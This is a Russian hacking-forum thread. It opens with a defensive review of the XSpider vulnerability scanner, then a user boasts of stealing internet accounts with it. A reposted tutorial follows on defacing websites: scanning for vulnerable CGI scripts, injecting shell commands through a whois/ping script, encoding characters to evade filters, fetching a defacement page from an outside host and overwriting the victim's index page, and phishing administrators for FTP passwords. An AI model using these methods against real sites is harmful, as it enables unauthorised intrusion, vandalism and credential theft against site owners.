MoneyMaker - здесь делают деньги! MoneyMaker - здесь делают деньги!

Пробив, взлом
Форум Darkmoney Форум Дубликат
Дроп-сервис
Электронные кошельки, карты, идентификация
Пробив, детализация
probivbiz
Курсы по анонимности и безопасности Чат Манимейкера
Благотворительный фонд
SkyCash
Гарант-сервис, безопасные покупки


Вернуться   MoneyMaker - здесь делают деньги! > Анонимность и безопасность > Теория и практика АиБ


Теория и практика АиБ Раздел для обсуждений вопросом по анонимности и безопасности. Статьи, книжки, вопросы и ответы.

garant
Like Tree4Likes
  • 1 Post By hackdays
  • 1 Post By hackdays
  • 2 Post By brotherX

Ответ
 
LinkBack Опции темы Опции просмотра
Старый 15.12.2013, 08:08   #1
Забанен
 
Регистрация: 19.03.2013
Сообщений: 1,401
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию Обзор сканера уязвимости XSpider



Назначение сканера
Сегодня практически все локальные сети имеют доступ к ресурсам глобальной сети интернет. В некоторых локальных сетях может не быть серверов, к которым предоставлен доступ извне и сеть выходит в интернет при помощи технологии NAT, то есть, один компьютер обеспечивает интернетом всю сеть. В некоторых сетях могут работать несколько серверов, к которым предоставлен доступ из интернета, а компьютеры в сети могут иметь глобальные IP-адреса. В любом случае, всегда есть хотя бы один компьютер, имеющий прямое подключение к интернету. Взлом такого компьютера поставит под угрозу информационную безопасность сети и может иметь печальные последствия. Если в сети работает несколько серверов с глобальными адресами и они предоставляют возможность, например, сотрудникам компании получить доступ к своей почте или к корпоративной базе данных из любой точки мира, то обеспечение безопасности такой сети становится достаточно сложной задачей, качественно решать которую сможет лишь сотрудник с высокой квалификацией. Основными обязанностями этого специалиста будет отслеживание новостных лент десятков сайтов, специализирующихся на безопасности, которые публикуют сведения об обнаруженных уязвимостях, немедленном реагировании на такие сообщения и самостоятельный поиск уязвимостей, которые еще неизвестны или уникальны. Учитывая, что между обнаружением уязвимости и до выхода официального исправления от производителя ПО может проходить достаточно много времени, специалист должен оперативно закрывать возможность использования уязвимости. Если сервисы, предоставляемые посетителям, пользуются достаточно большой популярностью, то чем быстрее администратор узнает об обнаружении уязвимости (в идеале, еще до ее опубликования на специализированных сайтах), то тем выше вероятность того, что он успеет закрыть обнаруженную брешь. Некоторые уязвимости могут быть уникальными для определенного сервиса. Например, ошибки в программировании скриптов могут открыть возможность для хакера установить на сервере консоль, используя которую он сможет получить полный контроль над сервером, а затем и над остальными ресурсами сети. Таким образом, обеспечение безопасности сети, в которой работают публичные сервисы, весьма сложное и тяжелое занятие, помочь в котором и призван XSpider.

XSpider может в полностью автоматическом режиме проверять компьютеры и сервисы в сети на предмет обнаружения уязвимостей. База уязвимостей постоянно пополняется специалистами Positive Technologies, что в сумме с автоматическим обновлением баз и модулей программы постоянно поддерживает актуальность версии XSpider.

XSpider может выполнять проверки по расписанию. Таким образом, настроив планировщик XSpider, автоматическое обновление и отправку отчетов о результатах проверки по почте или их сохранение на сетевом диске, можно значительно облегчить процесс обнаружения уязвимостей. Это позволит сконцентрировать свое внимание на борьбе с уже обнаруженными уязвимостями и на донастройке и обновлении программного обеспечения. В этом XSpider оказывает так же неоценимую помощь, выводя в отчет о результатах проверки не только информацию о найденной уязвимости, но и ссылки, например, на статьи на сайте Microsoft, которые описывают обнаруженную XSpider уязвимость и дают рекомендации по её устранению.



Установка XSpider
XSpider может быть установлен на любую ОС семейства Windows. Он проверяет все возможные уязвимости независимо от программной и аппаратной платформы узлов: начиная от рабочих станций под Windows и заканчивая сетевыми устройствами Cisco, в том числе, *nix, Solaris, Novell, AS400 и так далее. Сам процесс установки XSpider полностью автоматизирован. После запуска инсталлятора нужно согласиться с условиями лицензионного соглашения, выбрать папку, куда будет установлена программа и ввести имя папки в меню Пуск. После этого файлы XSpider будут скопированы и по окончании копирования XSpider может быть сразу запущен, без перезагрузки компьютера.

Интерфейс
После установки и запуска XSpider на экран будет выведено главное окно программы, которое показано на рисунке ниже.



В список сканируемых хостов нужно добавить адреса для сканирования. Можно добавить сразу диапазон адресов. После того, как список хостов сформирован, нужно выбрать профиль проверки либо из существующих, либо создать новый профиль исходя из собственных предпочтений. Существующие профили показаны на рисунке ниже.



Любой из существующих профилей можно настроить или создать новый профиль.
brotherX likes this.
hackdays вне форума   Ответить с цитированием
Старый 15.12.2013, 08:09   #2
Забанен
 
Регистрация: 19.03.2013
Сообщений: 1,401
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию



После того, как задача настроена, её можно сохранить, чтобы в дальнейшем не приходилось настраивать все заново.
Запуск созданных и сохраненных задач можно запланировать, настроив Планировщик.



Планировщик XSpider настраивается достаточно просто, по аналогии с планировщиком Windows. Внимания заслуживает последний этап настройки задания, пример которого показан ниже.



На этой вкладке мастера создания нового задания планировщика XSpider можно настроить отправку отчета на почтовый адрес или сохранить его в определенной папке.
hackdays вне форума   Ответить с цитированием
Старый 15.12.2013, 08:11   #3
Забанен
 
Регистрация: 19.03.2013
Сообщений: 1,401
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию

Поиск уязвимостей
Результаты проверки хоста с работающими Web, Mail серверами, системой удаленного администрирования
Каждое настроенное задание сохраняется в файле. Если запланирован запуск задачи по Планировщику, то результат её выполнения будет сохранен в файле .tsk, который может быть открыт в любое время при помощи XSpider. В файле сохраняется результат не только последней проверки хоста или хостов, а вся история проверок. Таким образом, можно контролировать изменения уровня безопасности после ликвидации обнаруженных ранее уязвимостей и обновления операционных систем и сервисов.

Пример загруженной задачи показан на рисунке ниже.



В данном примере на Windows XP SP2 с включенным файрволом был установлен Apache, PHP, mySQL, бесплатный скрипт для подписки на новости, демоверсия почтового сервера MERAK Mail Server (SMTP/ESMTP/POP3/IMAP4) с модулем удаленного управления и настройками по умолчанию, Remote Administrator 2.2 от компании FamaTech. Для этой проверки был создан профиль, в котором было включено сканирование всех портов хоста и поиск всех возможных уязвимостей. В результате аудита было выявлено много нареканий к скрипту подписки на новости и был обнаружен паблик-релей на почтовом сервере (так как настройка сервера после его установки не выполнялась). Все остальные сервисы, работающие на тестовом компьютере, были безошибочно обнаружены и идентифицированы.



В результатах проверки, помимо информации об обнаруженных уязвимостях, были приведены ссылки на описание уязвимости на сайтах, специализирующихся на безопасности и даны ссылки на загрузку обновленных версий программного обеспечения.
hackdays вне форума   Ответить с цитированием
Старый 15.12.2013, 08:13   #4
Забанен
 
Регистрация: 19.03.2013
Сообщений: 1,401
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию

Результаты проверки хоста с операционной системой Windows XP без сервис-пака и с отключенным брандмауэром
Во втором тесте аудиту был подвергнут хост с ОС Windows XP без сервис-пака с отключенным брандмауэром. Вкладка Уязвимости главного окна XSpider показана на рисунке ниже.



В ходе сканирования было обнаружено несколько критических уязвимостей. В результатах работы были даны ссылки статьи в Базе знаний Microsoft, которые описывают обнаруженную уязвимость и ссылки для загрузки исправлений, устраняющих эти уязвимости.

Примеры отчетов
XSpider предлагает на выбор несколько стандартных типов отчетов о результатах проверки.



Примеры отчетов приведены по ссылкам ниже.


Сканер может работать в полностью автоматическом режиме.

Автообновление баз и модулей сканера, созданные и запланированные к исполнению задачи сканирования, автоматическое создание отчетов позволяет сконцентрировать свои усилия на устранении найденных уязвимостей.

Запланированные проверки на новые уязвимости будут выполняться вновь и вновь сразу после добавления их описания в базы специалистами Positive Technologies.

Профили позволяют гибко настроить сканирование: от регулярного аудита до выполнения комплексных проверок. Настройками каждой задачи можно регулировать загрузку сети во время проведения проверок.

XSpider может проверить код, созданный веб-программистами, проверить почтовые, веб-сервера, операционные системы, сервера баз данных и другие сервисы, работающие в сети на наличие в них уязвимостей, простых или пустых паролей, ошибок в настройках и так далее.

В ходе анализа безопасности могут быть выполнены сотни проверок неограниченного количества хостов, проведение которых в ручном режиме заняло бы очень много времени, а в некоторых случаях, часть таких проверок никогда не была бы выполнена.

Подробные отчеты помогут оперативно устранять обнаруженные недочеты не теряя времени на поиск описаний обнаруженных уязвимостей. Хранимая история проверок позволяет оценить объем проделанной работы и быть в курсе текущей безопасности сети.

Справочная система XSpider написана простым языком и дает полное понимание всех настроек и принципов работы сканера.

Все это делает XSpider универсальным инструментом для поддержания информационной безопасности сети на высоком уровне.
Hasegawa likes this.
hackdays вне форума   Ответить с цитированием
Старый 16.12.2013, 17:57   #5
Начинающий манимэйкер
 
Регистрация: 21.05.2013
Сообщений: 215
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию

Помню были моменты, когда с помощью x spider-а тырили акки на инет Годами за инет не платили
kakaxixi вне форума   Ответить с цитированием
Старый 16.12.2013, 19:13   #6
Начинающий манимэйкер
 
Регистрация: 03.08.2013
Сообщений: 180
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию

Немного информации по теме. Надеюсь уважаемый ТС не обидится )


Дефейс


В этой статье я хочу рассказать вам как дефейсят сайты, то есть я начну с подготовки и закончу закачкой дефейса на сервер.
Давай разберёмся что же такое дефейс. Deface(с англ.) – обезображивать, уродовать. Не знаю кто писал мой англо-русский словарь, но в моём понимании deface – это замена главной странички сайта ( ну, по сути, словарь в чём-то прав – страничку ты всё таки уродуешь ). Ну для кого как. В тоже время, при создании дефейса, нужно многое уделять тому, что ты хочешь в поместить на главную страницу сайта жертвы. С одной стороны, дефейсы это хорошо. Вот был у соседа Семёна сайт на дорогом хостинге, а вот оформление страдало не по детски. Бывало зайдешь туда, посмотришь, а потом всю ночь кошмары снятся. Ты ведь не допустишь того, чтобы твоей родной стране по ночам кошмары снились? Ни за что! Тут тебе и поможет дефейс. Вот взломаешь сайт, закачаешь вместо главной страницы фотку какой-нибудь Памелы Андерсон, естественно в обнажённом виде! Вот теперь страна спать будет спокойно, узурпатора Семёна посадят за подрыв национального духа посредствам сети Интернет, а тебя наградят и возьмут в ФСБ, а оттуда и до президента недалеко.
Конечно есть и другая сторона монеты, это про то как за тобой будут охотиться дядки с биретами. Но я думаю сейчас она тебя мало интерисует.
Это был пример типа «зачем нужен дефейс». Ну что заинтерисовался? Тогда читай дальше.

Рас ты всерьёз решил заняться дефейсами, то тогда будем говорить серьёзно.
Первым делом нужно разобраться с помощью чего дефейсят сайты. В первую очередь это cgi,php, pl и другие скрипты, на которых написан сайт. Примерно процентов 60 этих скриптов в сети дырявые, то есть через них можно удалённо выполнять команды. А дырявых скриптов много потому, что в наше время кодеров хороших не так уж и много: кто-то дырявый скрипт написал, залил себе на сайт, потом кто-то пришёл и подумал что раз скрипты используют, значит они хорошие и свой сайт построил на таких же скриптах. Вот так-то. Во-вторых, админ может быть полным начинающим юзером и не париться с настройками и просто сделать панель администратирования на какой-то странице. Чаше всего на панель ставят пароль, но в моей практике встречались и такие случаи, когда панель была открыта для любого пользователя (вот мы угарали!!!). Например [Ссылки могут видеть только зарегистрированные пользователи. ]. Прикольно, да? Ну так вот. Также неплохо было бы изучить программное обеспечение сайта. А вдруг он стоит на каком-нибудь web-site v1.0? И в третьих, можно взломать хостинг, на котором хостится сайт, потом залезть в его домашнюю директорию ломаемого сайта и просто сменить index.html. Ну думаю до взлома хостинга не дойдёт, да и зачем лезть в home диру сайта, если у тебя в руках весь хостинг (etcpasswd бери и не мучайся).
Получается, что дефейсы, в основном, делаются по средствам дырявых скриптов. Обрати внимание, что скрипты это не только файлы с расширением .cgi, но и .php, .pl и другие. Хотя больше всего в сети распространены .cgi и .php. На них мы и остановимся.
Конечно мы не будем досканально изучать скрипты, находящиеся на ломаемом сайте. Мы поступим по другому – предоставим эту работу сканеру. Но всё же давай разберёмся как он работает. Сканер дырявых cgi – тебе ничего это словосочетание не говорит? Говорит! Да, мне тоже самое оно говорит. То есть в сканере заложена база названий скриптов и небольшой мануал по их эксплуатации. То есть натравив сканер на сайт, он(сканер) проверяет директории сайта на наличие дырявых скриптов, а потом выводит информацию о том какой скрипт он нашёл, и что с помощью него можно сделать. У тебя нет сканера? Вот несколько популярных программ подобной тематики:
X-spider – многофункциональный сканер уязвимостей, полностью на русском языке и весит немного(последняя версия -7.0,но у тебя на неё денег не хватит, так что качай 6.50) [Ссылки могут видеть только зарегистрированные пользователи. ]

[email protected] CGI Scanner – cgi сканер, русский и английский, качать с [Ссылки могут видеть только зарегистрированные пользователи. ]

Whisker – на мой взгляд покруче спайдера в этой области, что то навроде nmap’а, качать с [Ссылки могут видеть только зарегистрированные пользователи. ] но правда нужна поддержка перла( Activeperl или что-то навроде)

Будем считать что сканер по душе ты себе уже выбрал. Тогда принимайся за дело. Запускай сканер и вбивай там адрес сайта в сети. Всё процесс пошёл. Допустим, сканер всё проверил и нашёл один единственный скрипт – w***til.pl и всё, а что же делать дальше? Как использовать уязвимость? Не вопрос. Вбивай в браузере [Ссылки могут видеть только зарегистрированные пользователи. ] , там увидишь статью CGI-Жукс: подробно и по русски. Сливай её себе - ещё пригодиться. Так, ищем в статье w***til.pl. Ага! Вот оно:

W***TIL.PL
Местонахождение:/cgi-bin/w***til.pl
Уязвимость:Данный скрипт является веб-интерфейсом к утилитам whois, ping, traceroute и прочим, при этом он не проверяет параметры на символы передачи управления, и посему при помощи данного скрипта можно выполнять команды на сервере с привилегиями httpd.

Использование:
Чрезвычайно простое. При передаче скрипту параметров в виде ;%20echo%20hi он соответственно выведет строчку hi, т.е. исполнит команду, стоящую после точки с запятой и пробела. Для того, чтобы в полминуты осуществить deface сервера, залейте свою новую страничку командой
; ftp [Ссылки могут видеть только зарегистрированные пользователи. ].server/pub/user/evilhacker/index.htm" target="_blank">ftp://login:[Ссылки могут видеть только зарегистрированные пользователи. ].server/pub...cker/index.htm и затем замена осуществляется командой вроде ; mv index.htm /usr/www/data/www.poorsite.com/index.htm. Кстати, подобный образом и осуществляется львиная доля deface'ов серверов под Apache/ UNIX.

Понял? А, не понял что значит всякие там %20 и так далее? Сейчас всё объясню. Это ASCII символы, которые приходят тебе на помощь. То есть в чём состоит дыра скрипта – после ; и пробела он выполняет любую команду. Админ видно просёк это дело и прикрыл все команды, но забыл про то, что эти команды можно вписать в браузер и в ASCII коде. Вот таблица соответствия английских букв и символов с символами ASCII :



0 - %30 A - %41 a - %61
1 - %31 B - %42 b - %62
2 - %32 C - %43 c - %63
3 - %33 D - %44 d - %64
4 - %34 E - %45 e - %65
5 - %35 F - %46 f - %66
6 - %36 G - %47 g - %67
7 - %37 H - %48 h - %68
8 - %38 I - %49 i - %69
9 - %39 J - %4A j - %6A
: - %3A K - %4B k - %6B
= - %3D L - %4C l - %6C
? - %3 F M - %4D m - %6D
@ - %40 N - %4E n - %6E
- %5C O - %4F o - %6F
_ - %5F P - %50 p - %70
- - %7E Q - %51 q - %71
space - %20 R - %52 r - %72
! - %21 S - %53 s - %73
# - %23 T - %54 t - %74
$ - %24 U - %55 u - %75
% - %25 V - %56 v - %76
& - %26 W - %57 w - %77
. - %2E X - %58 x - %78
/ - %2F Y - %59 y - %79
Z - %5A z - %7A

Если же твой сканер не нашёл ничего это не значит, что на сайте нет бажных cgi. Тебе просто надо поискать их самому. Вот например, есть какой-то cgi, который выводит на экран список чего-либо, ты аккуратно подставляешь через | или ; команду, то есть получиться [Ссылки могут видеть только зарегистрированные пользователи. ] если в скрипте есть дырка, то он выдаст тебе список файлов в текущей директории. Но в скрипте может быть проверка на команды unix, тогда тебе поможет ascii таблица : вбиваем [Ссылки могут видеть только зарегистрированные пользователи. ]
и если скрипт дырявый, он нам выдаёт листинг директории. Потом резко закачеваем на любой хостинг готовый дефейс под именем Index.html , допустим это 12345.narod.ru, потом залезаем на сайт жертвы и используя дырявый скрипт закачиваем свой дефейс с narod.ru на ломаемый сайт. Это можно сделать следующим образом: [Ссылки могут видеть только зарегистрированные пользователи. ] -0 index.html [Ссылки могут видеть только зарегистрированные пользователи. ]. Дефейс готов.
Но также в скрипте может быть проверка на ; или | , то есть скрипт с ними работать не будет. Вот так-то.
А если всё выше перечисленное не действует, воспользуйтесь соц инженерией. Регите себе мыло, похожее на название хостинга. Например, если хостинг это [Ссылки могут видеть только зарегистрированные пользователи. ] мы регим какой-нибудь [Ссылки могут видеть только зарегистрированные пользователи. ]. С этого мыла пишем письмо нашему горе админу, где парим ему что-нибудь про переконфигурацию оборудования, а также убедительно просим выслать логин и пароль к его ftp аккаунту. А с этим ты наверное знаешь что делать надо.
Ну вот вообщем-то и всё что я могу вам рассказать. Конечно существует ещё множество способов дефейса, но это самые основные. Надеюсь что эта статья тебе поможет.
Удачи.
hackdays and Hasegawa like this.
brotherX вне форума   Ответить с цитированием
Старый 17.12.2013, 09:36   #7
Начинающий манимэйкер
 
Регистрация: 22.07.2013
Сообщений: 191
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию

А никто не в курсе, тот Спайдер, что на руборде лежит, действительно фулл? А то возникают сомнения.

Последний раз редактировалось Hasegawa; 17.12.2013 в 09:37.
Hasegawa вне форума   Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.



Текущее время: 21:45. Часовой пояс GMT.

Bes73 Bes73
garant
garant

Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2019, vBulletin Solutions, Inc. Перевод:
Search Engine Optimization by vBSEOzCarot
MoneyMaker.hk